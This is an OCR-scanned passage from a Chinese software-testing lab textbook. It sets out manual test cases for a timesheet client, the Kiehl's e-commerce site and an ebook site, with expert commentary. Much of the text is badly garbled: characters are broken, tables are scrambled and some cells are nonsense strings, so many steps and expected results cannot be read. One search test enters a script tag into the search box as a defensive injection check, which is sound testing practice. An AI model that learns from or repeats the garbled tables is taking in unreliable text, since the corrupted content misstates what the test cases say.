NEM 
; à (2) 可 以 在 静态 报表 的 列表 里 查看 
¿Esau snn “mpu CD 生成 的 静态 报表 数据 内 容 不 全 
存 为 静态 报表 |D 单 击 “操作 ”一 “保存 为 静态 : u 








报表 ” 





再 随 着 用 户 工作 时 间 变 化 而 
变化 
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续 表 
" _ 实际 测试 
号 | 测 试用 例 标题 BEER 期 望 结果 Fea 
CD 可 以 为 新 建 的 报表 选择 周期 
D 登录 账户 , 单 击 “报表 ”一 |(2) 可 以 选择 一 个 或 者 多 个 项 目 
5 | 创建 报表 “已 保存 报表 ” O 可 以 选择 一 个 或 者 多 个 用 户 
CD 单 击 "新 建 报表 ” (D. 可 以 选择 分 组 类 型 
(5) 设置 报表 名 称 
OD 登录 账户 , 单 击 “ 发 票 ” 一 
“Waka ROS" 
JU CO O) d c" mm OR I t O REO CB IR 
和 付款 方 Mor (2) 增加 付款 方 成 功 
(3) 单 击 “ 付 款 方 *~~“ 增 加 新 付 
款 方 ” 
CD 登录 账户 , 单 击 “发 票 ”一 
“创建 新 发 票 ” 
7 | 创建 新 发 村 (2) 输入 发 票 的 相关 信息 , 单 击 | 发 票 创建 成 功 
prn 
CO 完整 显示 发 票 内 容 
CD 打开 发 票 页 面 ; 
8 | 显示 发 票 内 容 。 “|(2) 单 击 选 中 发 票 后 面 的 < 显 | 2 Fin REND 
auus (3) 可 以 打印 或 者 转发 给 别人 
CD 打开 发 票 页 面 
9 | 删除 发 票 (2) 单 击发 票 后 面 的 “删除 ”选中 的 发 票 成 功 删除 
按钮 
4 
o 把 发 票 内 容 生成 |(1) ERROR e P pad aM ME 
POP 文件 CD 单 击发 票 后 面 的 PDF 按钮 | (。 用 户 可 以 下 载 PDF 文件 











DS 专家 点 评 


商务 系统 一 般 都 提供 在 线 发 票 功能 ,以 方便 用 户 自己 生成 发 票 。 


8.8 客户 端 模块 测试 用 例 设 计 


客户 端 是 时 间 管 理 的 重要 一 环 , 用 户 工作 的 时 间 主 要 通过 客户 端 捕获 。 登 录 工 时 通 客 
户 端 后 ,气泡 模式 显示 工时 如 图 8-10 所 示 。 
登录 工时 通 客户 端 后 ,widget 模式 显示 工时 如 图 8-11 所 示 。 


192 


AN 


软件 测试 实验 实 训 指南 





w IRA (计时 中 ) 


skysheng 
项 目 : 中 文 项 目 
任务 : 中 文 任务 C 


sc DIE 


8-10 气泡 模式 显示 工时 


客户 端 管理 测试 用 例如 表 8-6 所 示 。 
表 8-6 ”客户 端 管理 测试 用 例 


测试 用 例 标 题 


操作 步骤 


时 间 记 录 


opi 


图 8-11 widget 模式 显示 工时 


期 望 


ov 


实际 测试 


(Pass/Fail) 





下 载 客户 端 安 装 包 
并 且 安 装 


CD 从 工时 通 系 统 的 下 载 页 面 下 
载 相 应 的 安装 包 , 网 址 为 
http://www. workcard. net/ 
www/download. shtml 

(2) 工时 通 的 客户 端 支持 
Windows、Mac、Linux 三 种 类 
型 的 操作 系统 。 本 测试 用 例 
以 Windows 为 例 


(1) 安装 包 下 载 成 功 
(2) 安装 成 功 





to 


登录 客户 端 


(1) 运行 工时 通 客户 端 
(2) 输入 账户 名 和 密码 
(3) 选择 项 目 名 称 和 任务 


COD 工时 通 客户 端 能 成 功 连接 服 
务 器 

(2) 正确 获得 账户 名 下 的 项 目 名 
称 和 任务 

(3) 客户 端 登录 成 功 





从 窗口 切换 到 气泡 
模式 


OD 登录 客户 端 

(2) 默认 显示 一 个 小 窗口 ,上 面 显 
示 项 目 名 称 、 任 务 、 记 录 时 间 、 
“暂停 ”或 “播放 ”按钮 等 

(3) 在 小 窗口 上 单 击 “最 小 化 ” 
按钮 


CD 小 窗口 消失 
(2) 显示 气泡 模式 ,上 面 显 示 暂 停 
或 播放 按钮 .记录 时 间 





»- 


从 气泡 模式 切换 到 
widget 模式 


(1) 登录 客户 端 ,切换 到 气泡 模式 
(2) 在 气泡 模式 单 击 “ 打 开 widget" 
按钮 


(1) 气泡 模式 消失 
(2) 显示 widget 模式 





a 





修改 屏幕 截图 提示 





CD 登录 客户 端 

(2) 打开 客户 端的 设置 窗口 
(3) 切换 到 “截屏 ”设置 窗口 
(4) 修改 屏幕 截图 提示 项 





D 屏幕 截图 提示 倒计时 的 默认 
时 间 是 15s, 可 以 修改 这 个 值 

(2) 也 可 以 禁用 屏幕 截图 提示 ,这 
样 每 个 屏幕 截图 时 不 会 有 任 
何 提示 
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续 表 

序 实际 测试 
号 | 测 试用 例 标题 RESE 期 望 结果 Esp 

(D ERE CD 摄像 天 默认 是 关闭 的 

(D 打开 客户 端的 设置 窗口 。 |o) 如 果 打开 摄像 头 设置 ,在 每 次 
6 | 打开 摄像 头 图 像 |(3) 切换 到 “截屏 "设置 窗口 屏幕 截图 时 ,会 同时 捕获 摄像 

(4) 修改 摄像 头 图 像 项 头 的 图 像 ,并 且 上 传 到 服务 器 

了 CD. 自动 启动 项 默认 是 关闭 的 
7 | 设置 开机 自动 启动 (2 打开 这 个 开关 ,开机 时 就 会 自 

O 切换 到 “启动 "设置 窗口 i 

(4) 修改 “自动 启动 项 




















xF 专家 点 评 


工时 通 客 户 端 最 重要 的 功能 是 记录 员工 的 工作 时 间 , 工 作 时 间 管 理 最 终 来 源 就 是 客户 
端 记录 。 


W 拓展 训练 


选择 工时 通 系 统 http://www. workcard. net 中 一 个 模块 ,进行 更 深入 的 测试 用 例 
设计 。 

提醒 : 可 以 在 http://collegecontest. roqisoft. com/awardshow. html 中 查阅 历年 全 国 
高 校 大 学 生 在 这 些 网 站 中 发 现 的 更 多 测试 用 例 设计 。 
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读书 笔记 
A «€; ed; eq; ^4; e; ed: «€; ed: e@; ed; eq; ed? e@; 


读书 笔记 Name: Date: 








励志 名 名 : Factors such as self-confidence and ambition, combined with 


determination and willpower, contributes to eventual success. 





自信 、 雄 心 , 加 上 决心 和 毅力 等 因素 是 造成 最 终 成 功 的 原因 。 


















































设计 电子 商 务 类 测试 用 例 | 


CXBHÉ ) 

电子 商务 网 站 一 般 都 有 一 个 整洁 美观 的 首页 ,在 首页 中 有 热门 商 
品 展示 、 联 系 我 们 、 版 权 信 息 等 。 另 外 ， bae s m. 定 会 有 用 户 管 
理 , 用 户 注册 登录 后 进行 商品 的 购买 ; 商品 一 定 能 排序 ,购买 后 能 评 
价 ; 网 站 还 要 能 支持 商品 搜索 ,能 尽快 找到 客户 所 需要 的 商品 ; 对 客 
户 购买 的 商品 一 定 要 给 出 一 个 账单 ; 客户 可 以 管理 自己 的 账户 ,填写 
收 货 地 址 、 信 用 卡 信息 等 。 通 过 这 个 实验 ,读者 能 够 划分 功能 模块 , 然 
后 进行 核心 功能 的 测试 用 例 设计 。 

通过 本 实验 的 学 习 , 软 件 测试 工程 师 能 自己 设计 相对 完备 的 电子 
商务 类 测试 用 例 ,方便 自己 或 他 人 执行 这 些 测试 用 例 , 通 过 经 典 测试 
用 例 的 设计 展示 ,让 每 位 读者 体会 设计 思路 。 


9.1 电子 商务 Kiehl's 项 目 总 述 


Kiehl's 是 一 个 护肤 品 销售 网 站 ,网 址 为 http://www. kiehls. 
com。 访 问 Kiehl's 网 站 ,会 在 网 站 的 主页 看 到 一 些 关键 信息 ; 用 户 可 
以 注册 成 为 该 网 站 的 成 员 , 注 册 完 登录 网 站 ,可 以 管理 账户 ; 每 一 
产品 都 有 详细 信息 ; 支持 快速 搜索 产品 ; 可 以 在 线 订 购 产 品 , 进 行 账 
单 管理 ; 能 查看 自己 在 该 网 站 的 相关 情况 (包括 购物 历史 记录 ,支付 
方式 .个 人 邮寄 地 址 等 ) 。Kiehls 网 站 主页 如 图 9-1 所 示 。 
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In celebration of our first-ever loyalty 
program, we wish to extend to you 


1599 0FF 


your purchase when you join 


SEPTEMBER 20™ - 30™, 2013 


JOIN NOW JOIN IN STORE 


¿ Correcting & 
Anti-Aging rrecting 


Favorites 














SIGNIN/REGISTER | EMALSIGNUP | CUSTOMERSERVICE | STORE LOCATOR 


since " ó iesi HEALTHY SKIN CONSULTATION> SPA 1851 > 
Sea a 
3 complimentary samples + free shipping on $50 SHOPPING BAG (o) EE 
NEW SKIN CARE BODY MEN HAIR. GIFTS & MORE ABOUT US. OFFERS. 








图 9-1 Kiehl's 网 站 主页 


9.2 电子 商务 网 站 测试 用 例 设 计 思 路 


根据 项 目 描述 ,基本 可 以 将 测试 内 容 分 为 6 个 模块 ,分 别 为 主页 面 、 账 户 管 
息 .搜索 .账单 管理 和 My Kiehl's's。 测 试 范围 及 测试 内 容 如 表 9-1 所 示 。 


表 9-1 测试 范围 及 测试 内 容 


JER 


品 信 





测试 范围 测试 内 容 





(1) 检查 主页 面 是 否 正常 显示 

(2) 检查 ABOUT US 

主页 面 (3) 检查 Privacy Policy 

(4) 检查 Contact Customer Service 
(5) 检查 Copyright 





(1) 通过 Register 注册 账户 

(2) 通过 E-mail 注册 账户 

账户 管理 (3) 使 用 正确 的 用 户 名 和 密码 登录 
(4) 使 用 错误 的 用 户 名 或 密码 登录 
(5) 忘记 密码 








实验 9 设计 电子 商务 类 测试 用 例 


Sk 





测试 范围 


测试 内 容 





CD 产品 分 类 信息 NEW/SKIN CARE/BODY/MEN/HAIR/GIFTS&.MORE 
(2) 排序 

(3) 检查 图 片 显示 

(4) 产品 订购 

(5) 发 送 产品 信息 到 朋友 团 

(6) 查看 Wish List 

(7) 打印 产品 信息 页 面 

(8) Bookmark & Share 

(9) Write Review 

(10) Read Review 





搜索 


(1) 搜索 存在 的 产品 
(2) 搜索 不 存在 的 产品 
(3) 在 关键 字 中 包含 脚本 语言 





账单 管理 


(1) 更 改 产品 订购 数量 
(2) 填写 SHIPPING 
(3) 填写 BILLING 
(4) 下 订单 





My Kiehl's 





(1) Personal Information 
(2) Addresses 

(3) Wish List 

(4) Payment Methods 
(5) Order History 

(6) My Favorites 

(7) Products I've sampled 


9.3 主页 面 模块 测试 用 例 设 计 


测试 用 例 设 计 并 不 复杂 。 根 据 测 试 范围 ,进一步 细 化 产生 测试 用 例 。 主 页 面 测试 用 例 

















如 表 9-2 所 示 。 


表 9-2 主页 面 测试 用 例 


























序 w 实际 测试 
号 测试 用 例 标 题 操作 步骤 期 望 结果 (Pass/Fail) 
" 检查 站 点 主页 面 内 | (1) 打开 主页 面 主页 面 上 图 片 和 文字 可 以 正常 

容 显 示 (2) 查看 主页 面 内 容 显 示 显示 
检查 页 面 上 的 链接 | (1) 打开 主页 面 所 有 链接 能 被 打开 ,而 且 内 容 显示 

是 否 有 效 (2) 单 击 页 面 上 所 有 的 链接 正常 
3 检查 ABOUT US|( 单 击 ABOUT US (1) ABOUT US 页 面 打 开 正常 

页 面 (2) 检查 页 面 内 容 显示 (2) 页 面 内 容 可 以 正常 显示 
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S 





LE 


测试 用 例 标 题 


操作 步骤 


期 望 结果 


实际 测试 
(Pass/Fail) 





检查 Privacy Poli- 
cy 页 面 


(1) 单 击 Privacy Policy 
(2) 检查 页 面 内 容 显示 


(1) Privacy Policy 页 面 打开 正常 
(2) 页 面 内 容 可 以 正常 显示 





检查 Contact Cus- 
tomer Service 页 面 


(1) 单 击 Contact Customer Serv- 
ice 


(2) 检查 页 面 内 容 显示 


(1) Service 页 面 打 开 正常 
(2) 服务 条 款 按 规则 排序 





6 | 检查 Copyright 信息 





检查 Copyright 信息 





CD 格式 显示 正确 





(2) 版 权 是 当前 年 份 








xS 专家 点 评 





主 界面 还 可 以 有 许多 测试 点 ,这 里 仅仅 是 给 一 个 模板 ,更 多 的 测试 场景 还 可 以 发 散 。 


9.4 账户 管理 模块 测试 用 例 设 计 2 


电子 商务 网 站 必然 需要 一 个 账户 ,账户 管理 功能 是 电子 商务 网 站 的 必 备 功能 。 上 账户 管 


理 测 试用 例如 表 9-3 


所 示 。 


表 9-3 账户 管理 测试 用 例 


























" 实际 测试 
结 
号 | 测试 用 例 标 是 操作 步骤 期 望 结果 人 
ais (1) 打开 Register 页 面 
1 | CD 输入 用 户 各 和 密码 账户 注册 成 功 
(3) 注册 账户 
通过 Email 注册 |(1) 打开 通过 Email 注册 对 话 杠 
2 | 账户 (2) 输入 E-mail 地 址 ERN 
CD 打开 登录 页 面 
3 | 登录 站 点 (2) 输入 正确 的 用 户 名 和 密码 FFR 
— CD 打开 登录 页 面 CD EGER 
4 | 错误 登录 信息 。 | (2) 输入 错误 的 用 户 名 或 者 密码 |(2) 提示 无 效用 户 名 和 密码 信息 
(1) 弹出 Password Recovery 对 
O 打开 登录 页 面 ie 
5 | 忘记 密码 (2) 输入 账户 邮件 地 址 ,并 且 单 击 
(2) 单 击 Forgot Your Password 发 送 
(3) 收 到 包含 密码 的 邮件 











xS 专家 点 评 


账户 注册 和 登录 有 很 多 测试 点 ,这 里 仅仅 是 给 个 模板 ,更 多 的 测试 场景 还 可 以 发 散 。 
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产品 信息 模块 测试 用 例 设 计 


电子 商务 网 站 的 重要 功能 之 一 就 是 商品 展示 ,涉及 商品 分 类 、 排 序 、 添 加 购物 车 等 核心 
功能 。 产 品 信息 测试 用 例如 表 9-4 所 示 。 


表 9-4 产品 信息 测试 用 例 











序 " 实际 测试 
号 测试 用 例 标题 操作 步骤 期 望 结果 (Pass/Fail) 

CD 单 击 页 面 分 类 产品 NEW/|(1) 所 有 分 类 产品 页 面 能 被 正常 

" SKIN CARE/BODY/MEN/| 打开 

1 | 检查 分 类 产品 内 容 | ^ HAIR/GIFTS&MORE | 产品 图 片 .文字 内 容 .数量 信 

(2) 检查 打开 的 产品 内 容 息 显示 正常 

(1) 打开 某 类 产品 , 比如 New 

Product 

(2) 为 列 出 的 产品 按 以 下 方式 排序 

2 | 产品 排序 Price(High To Low) 产品 能 够 按 规则 排序 


Price(Low To High) 
Alphabetically( A-Z) 
AlphabeticallyCZ- A) 





添加 产品 到 My 
Bag 


A) 打开 某 个 产品 , 比如 gloss 
d'armani 

(2) 为 产品 选择 颜色 .数量 ,然后 
添加 到 My Bag 


OD 产品 成 功 加 入 My Bag 
(2) 产品 的 价格 ,数量 显示 正确 





发 送 产品 信息 到 


(1) 打开 某 个 产品 , 比如 gloss 


d'armani 


(1) 邮箱 可 以 收 到 邮件 











朋友 (2) 单 击 Send to Friend D 邮件 中 包含 产品 的 介绍 信息 
OO. 打开 某 个 产品 , 比如 gloss ` — 
5 | 查看 WishList 内 容 d'armani E Aa nan x usc 
(2) 单 击 WishList SS m 
(1) 打开 某 个 产品 , 比如 gloss| (1) 弹出 打印 属性 对 话 框 
6 | 打印 产品 内 容 页 面 d'armani (2) 产品 信息 可 以 打印 到 打印 机 
(2) fidi Print 或 者 转换 到 PDF 文件 
CD 自动 弹出 Bookmark & Share 
" 窗口 
共享 产品 信息 到 第 | (1) 打开 某 个 产品 的 详细 页 面 y 
7 | = 方 站 点 (2) Mii Share (2) 打开 的 页 面 可 以 共享 到 


Facebook/Twitter/Blogger/ 
Linkedln/Email--- 





Write Review 


OD 打开 某 个 产品 

(2) 在 产品 图 片 的 下 方 会 显示 
Write Review 

(3) 单 击 Write Review 

(4) 输入 信息 为 所 有 需要 的 字段 


(1) 弹出 Write Your Review 页 面 
(2) 如 果 必 填 字 段 为 空 ,将 出 现 相 
应 的 提示 信息 








Read Review 


CD 打开 某 个 产品 
(2) 在 产品 图 片 的 下 方 会 显示 
Read Review 





(3) 单 击 Read Review 


Review 信息 页 面 能 被 展开 
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D 专家 点 评 


商品 的 展示 不 只 包括 商品 的 分 类 展示 ,还 包括 单个 商品 的 展示 ,展示 信息 要 清晰 、 美 观 。 
分 享 、 加 购物 车 等 涉及 登录 状态 和 第 三 方 ,也 可 作为 测试 基本 点 。 


9.6 搜索 模块 测试 用 例 设计 


电子 商务 网 站 的 商品 不 少 ,就 算 有 分 类 ,也 不 可 能 一 个 个 找 过 去 ,搜索 功能 是 必需 的 。 
搜索 测试 用 例如 表 9-5 Bron 。 

















表 9-5 搜索 测试 用 例 








序 " 实际 测试 
号 测试 用 例 标 题 操作 步骤 期 望 结 果 (Pass/Fail) 
(1) 在 搜索 文本 框 输入 产品 关键 字 , 比 
1 在 站 点 搜索 指定 如 产品 名 称 在 结果 页 面 出 现 搜索 产品 
产品 (2) 单 击 Search 按钮 或 者 直接 按 | 信息 


Enter 键 





(1) 在 搜索 文本 框 中 输入 一 个 无 效 的 产 
搜索 无 效 的 产品 品名 称 , 比 如 不 存在 的 产品 名 称 “| 在 搜索 页 面 提示 产品 名 称 
名 称 (2) 单 击 Search 按钮 或 者 直接 按 | 不 存在 

Enter 键 


to 





(1) 在 搜索 页 面 提示 产品 
关键 字 中 包含 脚本 | (1) 在 输入 的 关键 字 中 包含 脚本 符号 ， 名 称 不 存在 


语言 比如 < script > test </script > (2) 页 面 没有 异常 显示 


x wasis 


搜索 模块 可 测试 点 比较 多 ,比如 模糊 匹配 、 智 能 推荐 等 。 
9.7 账单 管理 模块 测试 用 例 设计 


账单 管理 就 是 创建 订单 、 可 修改 产品 订购 信息 。 账 单 管理 测试 用 例如 表 9-6 所 示 。 
表 9-6 ”账单 管理 测试 用 例 

















实际 测试 


结 
测试 用 例 标题 操作 步骤 期 望 结 果 (Pass/Fail) 


ma 





COD 增加 产品 到 My Bag à 
E E 
修改 订购 的 产品 o5, y Bag "me 订购 总 价 根据 产品 的 数量 自动 


购 数 量 
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S 


实际 测试 
CPass/Fail) 





tH 


测试 用 例 标 题 操作 步骤 期 望 结果 





CD 增加 产品 到 My Bag 

(2) 单 击 Check out 

- (3) 在 Shipping 页 面 填写 邮寄 地 | 。,， 
处 理 产品 订单 址 和 邮寄 方式 产品 订购 成 功 
(4) 在 Billing 页 面 填写 付款 信息 
(5) 单 击 Place Order 


[S 

















D 专家 点 评 


账单 管理 还 有 很 多 测试 点 ,这 里 仅仅 是 给 个 模板 ,更 多 的 测试 场景 还 可 以 发 散 。 


9.8 My Kiehl's 模块 测试 用 例 设 计 


My Kiehls 为 个 人 信息 管理 ,包括 个 人 登录 信息 、 收 货 地 址 和 支付 信息 等 。 My Kiehl's 
测试 用 例如 表 9-7 所 示 。 





表 9-7 My Kiehl's 测试 用 例 























序 实际 测试 
号 测试 用 例 标 题 操作 步骤 期 望 结 果 LPass/ Fail) 
" (1) 登录 站 点 
1 修改 账户 信息 和 重 (2) 转换 到 Personal Information| 可 以 更 改 个 人 信息 和 账户 密码 
置 密码 
页 面 
" OD 登录 站 点 " 
2 | 修改 地 址 信息 (2) 转换 到 Addresses 页 面 可 以 建立 个 人 的 地 址 信息 
填写 信用 卡 支 付 |(1) 登录 站 点 可 以 确定 订购 的 支付 方式 ,并 填写 
信息 (2) 转换 到 Payment Methods 页 面 | 信用卡 信 息 , 以 便 以 后 直接 调用 





x 专家 点 评 


电子 商务 是 利用 微机 技术 和 网 络 通信 技术 进行 的 商务 活动 。 各 国政 府 、 学 者 、 企 业界 人 
士 根据 自己 所 处 的 地 位 和 对 电子 商务 参与 的 角度 和 程度 的 不 同 , 给 出 了 许多 不 同 的 定义 。 
电子 商务 虽然 在 各 国 或 不 同 的 领域 有 不 同 的 定义 ,但 其 关键 依然 是 依靠 着 电子 设备 和 网 络 
技术 进行 的 商业 模式 。 随 着 电子 商务 的 高 速 发 展 , 它 已 不 仅仅 包括 其 购物 的 主要 内 涵 , 还 包 
括 了 物流 配送 等 附带 服务 。 电 子 商 务 包括 电子 货币 交换 、 供 应 链 管 理 、 电 子 交 易 市 场 、 网 络 
营销 、 在 线 事务 处 理 、 电 子 数据 交换 (EDI) 存货 管理 和 自动 数据 收集 系统 。 在 此 过 程 中 ,用 
到 的 信息 技术 包括 互联 网 、 外 联网 ,电子 邮件 、 数 据 库 . 电 子 目录 和 移动 电话 。 

当然 ,除了 基本 的 流程 .基本 功能 验证 外 ,还 要 设计 一 些 异 常 的 案例 。 
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df emas 


选择 电子 商务 网 站 http://www. kiehls. com 中 的 一 个 模块 ,进行 更 深入 的 测试 用 例 
设计 。 

提醒 : 可 以 在 http://collegecontest. roqisoft. com/awardshow. html 中 查阅 历年 全 国 
高 校 大 学 生 在 这 些 网 站 中 发 现 的 更 多 测试 用 例 设计 。 
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NA 
读书 笔记 
ae 


读书 笔记 Name: Date: 








励志 名 句 : He is never alone that is in the company of noble thoughts. 





思想 崇高 者 , 绝 不 会 孤独 。 


















































dj «8; ^4; eq; ed; uq; ed; eq; o4; oé; ^4; ut; ^4; on; 





设计 电子 书籍 类 测试 用 例 | 


实验 目的 


电子 书籍 类 网 站 一 般 都 会 有 书籍 动态 展示 、 样 张 下 载 .书籍 简介 、 
联系 作者 、 如 何 购 买 等 相关 内 容 。 具 体 到 每 本 书 , 可 能 还 会 有 封面 ,前 
言 、 目 录 结 构 , 供 读者 更 全 面 地 了 解 本 书 。 还 有 可 能 有 配套 资料 下 载 。 
通过 本 实验 ,读者 可 以 体会 如 何 对 一 个 电子 书籍 类 网 站 进行 测试 用 例 
设计 ,哪些 是 必须 设计 的 重点 。 

通过 本 实验 的 学 习 , 软 件 测试 工程 师 能 自己 设计 相对 完备 的 电子 
书籍 类 测试 用 例 ,方便 自己 或 他 人 执行 这 些 测试 用 例 ,通过 经 典 测试 
用 例 的 设计 展示 ,让 每 位 读者 体会 设计 思路 。 


10.1 电子 书籍 books 项 目 总 述 


言 车 金 叶 软件 研究 中 心 一 软件 工程 师 成 长 之 路 系列 丛书 ( 重 点 大 
学 软件 工程 规划 系列 教材 一 软件 工程 师 系 列 实践 指南 从 书 一 动态 展 
示 官 网 ) 网 址 为 http://books. roqisoft. com/ ,主要 介绍 言 若 金 叶 研究 
中 心 的 各 种 书籍 。 对 于 这 样 的 网 站 ,除了 要 进行 功能 测试 .性 能 测试 ， 
还 需要 对 内 容 介绍 进行 相关 测试 。 


10.2 ”电子 书籍 测试 用 例 设 计 思 路 


通过 对 电子 书籍 网 站 提供 的 主要 功能 进行 设计 测试 用 例 ,确保 主 
功能 都 能 正常 工作 。 


10.3 ”电子 书籍 网 站 测试 用 例 设计 


电子 书籍 网 站 的 测试 用 例 都 是 非常 简单 的 ,一 般 用 户 也 可 以 执行 
测试 ,提交 测试 结果 。 电 子 书籍 网 站 测试 用 例如 表 10-1 所 示 。 
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510-1. 电子 书籍 网 站 测试 用 例 
Es 实际 测试 
测试 用 例 标 题 操作 步骤 期 望 结 果 (Pass/Fail) 
(1) 用 浏览 器 打开 言 若 金 叶 精 品 软件 著作 展 | (1) 链接 到 和 步骤 (2) 所 单 
主页 ~ 作品 链接 ZR Fl http://books. roqisoft. com 击 的 作品 对 应 的 页 面 
(2) 单 击 滚动 的 任 一 作品 图 片 (2) 响应 页 面 上 的 元 素 正确 
(3) 检查 响应 的 页 面 并 且 排 版 规范 
ER fep T / ode oleam |A ATREA EUER 
(2) BU P fE Zh RR ERE hr E ? 
主页 ~ 页 底 “ 安 全 CD 用 浏览 器 打开 言 车 金 叶 精品 软件 著作 展 |(1) 链接 到 和 步骤 (2) 所 单 
联盟 站 长 平台 ” 示 网 http://books. rogisoft. com 击 的 内 容 对 应 的 页 面 
按钮 B [D 单 击 页 底 “安全 联盟 站 长 平台 ”按钮 (2) 响应 页 面 上 的 元 素 正确 
(3) 检查 响应 的 页 面 并 且 排 版 规范 
CD 用 浏览 器 打开 言 若 金 叶 精品 软件 著作 展 
作品 封面 ~“ 单 击 示 网 http://books. roqisoft. com (1) 链接 到 和 步骤 (3) 所 单 
进入 书籍 配套 资 | (2) 单 击 任 一 作品 ,进入 作品 首页 击 的 作品 对 应 的 主页 面 
源 下 载 与 电子 书 |(3) 单 击 “ 单 击 进入 书籍 配套 资源 下 载 与 电 |(2) 响应 页 面 上 的 元 素 正确 
籍 免费 试 读 ” 链 接 子 书 籍 免费 试 读 " 链 接 并 且 排 版 规范 
(4) 检查 响应 的 页 面 
(1) 用 浏览 器 打开 言 若 金 叶 精品 软件 著作 展 
示 网 http://books. rogisoft. com 
书籍 配套 资源 下 
(2) 单 击 任 一 作品 ,进入 作品 首页 
Wa EP [oy gii A SIRE E Ke UPERI RAE 
子 书籍 免费 试 读 " 链 接 
(4) 单 击 书 籍 图 片 
(1) 用 浏览 器 打开 言 若 金 叶 精品 软件 著作 展 
示 网 http://books. roqisoft. com 
书籍 配套 资源 下 
la s| OD 单 击 任 一 作品 ,进入 作品 首页 
Mus (REIP G) 单 击 * 单 击 进入 书籍 配套 资源 下 载 与 电 | 吏 转 到 书籍 官网 
子 书籍 免费 试 读 " 链 接 
(4) 单 击 书籍 官网 链接 
(1) 用 浏览 器 打开 言 车 金 叶 精品 软件 著作 展 
示 网 http://books. roqisoft. com 页 面 弹出 文件 下 载 提示 框 ， 
E T CD 单 击 任 一 作品 ,进入 作品 首页 若 单 击 “ 下 载 ” 按 钮 , 则 进行 
下 载 "链接 (3) 单 击 “ 单 击 进 入 书籍 配套 资源 下 载 与 电 | 下 载 操作 ; 若 单 击 “ 取 消 ” 按 
子 书籍 免费 试 读 ” 链 接 钮 , 则 关闭 文件 下 载 提示 框 
(4) 单 击 教学 PPT 下 载 链接 
(1) 用 浏览 器 打开 言 若 金 叶 精品 软件 著作 展 
书籍 配套 资源 下 示 网 http://books. roqisoft. com 页 面 弹出 源码 压缩 包 下 载 提 
载 一 导航 “软件 测 | (2) 单 击 任 一 作品 ,进入 作品 首页 示 框 ,车 单 击 “ 下 载 "按钮 , 则 
试 书籍 ”一 “大 学 |(3) 单 击 “ 单 击 进入 书籍 配套 资源 下 载 与 电 | 进 行 下 载 操作 ; 若 单 击 “ 取 
学 籍 管理 系统 源 子 书籍 免费 试 读 ”链接 消 ? 按 钮 , 则 关闭 该 下 载 提 
码 下 载 " 链 接 (4) 单 击 导 航 条 中 的 “软件 测试 书籍 ” 示 框 





O) 单 击 “大 学 学 籍 管理 系统 源码 下 载 ”链接 
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续 表 
ñ 实际 测试 
测试 用 例 标题 操作 步骤 期 望 结果 S a 
CD 用 浏览 器 打开 言 若 金 叶 精 品 软件 著 
作 展 示 网 http://books. roqisoft com 
书籍 配套 资源 下 |(2) 单 击 任 一 作品 ,进入 作品 首页 (1) 链接 到 和 步骤 (5) 所 单 击 
载 一 导航 “软件 开 | (3) 单 击 “ 单 击 进入 书籍 配套 资源 下 载 与 | ”的 作品 对 应 的 页 面 
发 书籍 "~ 书籍 目 | 。 电子 书籍 免费 试 读 "链接 (2) 响应 页 面 上 的 元 素 正确 并 
录 结 构 链接 (4) 单 击 导航 条 中 的 “软件 开发 书籍 ” 且 排 版 规范 
(5) 单 击 查看 书籍 目录 结构 链接 
(6) 检查 响应 的 页 面 
D 用 浏览 器 打开 言 若 金 叶 精 品 软件 著 
SEREEHT( 音 击 任 一 作品 ,直入 作 品 生硬 8 
载 一 导航 “软件 项 FE La pa 页 面 弹出 软件 下 载 提示 框 , 若 
OO 单 击 “ 单 击 进入 书籍 配套 资源 下 载 与 | ns 
目 管理 书籍 ”一 el 单 击 * 下 载 " 按 钮 , 则 进行 下 载 
T 电子 书籍 免费 试 读 "链接 Gi 
书籍 大 学 学 籍 管 |(，、 单 击 导航 条 中 的 “软件 项 目 管理 书 Bo 若 单 击 * 取 消 "按钮 , 则 
理 系统 安装 软件 | a 关闭 该 下 载 提示 框 
MEE (5) 单 击 “ 书 籍 大 学 学 籍 管理 系统 安装 软 
件 下 载 "链接 
(1) 用 浏览 器 打开 言 若 金 叶 精品 软件 著 
作 展 示 网 http://books. roqisoft. com 
D E T O 单 击 任 一 作品 ,进入 作品 首页 
amapag O 单 击 * 单 击 进 和 书籍 配套 资源 下 载 与 | 浏览 器 打开 该 电子 书 的 在 线 斌 
籍 电子 版 在 线 试 | ”电子 书 籍 免费 试 读 " 链 接 读 页 面 
k PI^ QD 单 击 导航 条 中 的 “中 英 双语 励志 书 
读 链 接 
(5) 单 击 书籍 电子 版 在 线 试 读 链接 
CD 用 浏览 器 打开 言 若 金 叶 精品 软件 著 
作 展 示 网 http://books. roqisoft. com 
na 77 a» 单 击 任 一 作品 ,进入 作品 首页 E e 
(3) BU E PE fE XC 00 0 B|” 
按钮 
CD 用 浏览 器 打开 言 若 金 叶 精品 软件 著 
作品 封面 “分享 作 展 示 网 http://books. roqisoft. com | 弹出 关闭 分 享 按钮 的 确认 框 ， 
到 "插件 二 关闭 | C2) 单 击 任 一 作品 ,进入 作品 首页 若 单 击 * 确 定 "按钮 , 则 关闭 分 
ndi (3) BUE EHE fE 3 E XL 00 “y 0E B|” s 车 单 击 “ 取 消 ” 按 钮 ， 
按钮 则 取消 关闭 操作 
(D 单 击 “ 关 闭 "按钮 
CD 用 浏览 器 打开 言 若 金 叶 精品 软件 著 
作 展 示 网 http: / /books. roqisoft. com 
作品 封面 二 “分享 
e e mi | CD 单 击 任 一 作品 ,进入 作品 首页 m" 
bad JiaThis CD BOE E z # 3 I EID “ y E B|” 页 面 打开 Jia This 首页 





按钮 
(4) 单 击 Jia This 链接 
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续 表 
x: 实际 测试 
测试 用 例 标题 Bm Ba wm (Pass/Fail) 
CD 用 浏览 器 打开 言 车 金 叶 精品 软件 著 
作 展 示 网 http://books. roqisoft com 
作品 封面 "分享 
: (2) 单 击 任 一 作品 ,进入 作品 首页 
到 "插件 一 任意 网 | 3) 鼠标 悬 停 在 页 面 右 边 的 “分 享 到 "| 弹出 所 选中 网 址 的 分 享 网 页 
址 链接 
按钮 
(4) 单 击 任意 网 址 看 链接 是 否 有 效 
(1) 用 浏览 器 打开 言 若 金 叶 精品 软件 著 
m TEE FI http: / /books. roqisoft com 
ric gas (D 单 击 任 一 作品 ,进入 作品 首页 
(3) 鼠标 悬 停 于 页 面 右边 的 “分 享 到 " 按 | 搜索 结果 为 空 
中 输入 非法 字符 sa ý 
或 不 存在 的 网 址 钮 , 单 击 “ 查 看 更 多 ”按钮 
(4) 在 搜索 框 中 输入 非法 字符 或 不 存在 
的 网 址 ,如 @efe. $ # $ 
CD. 用 浏览 器 打开 言 若 金 叶 精品 软件 著 
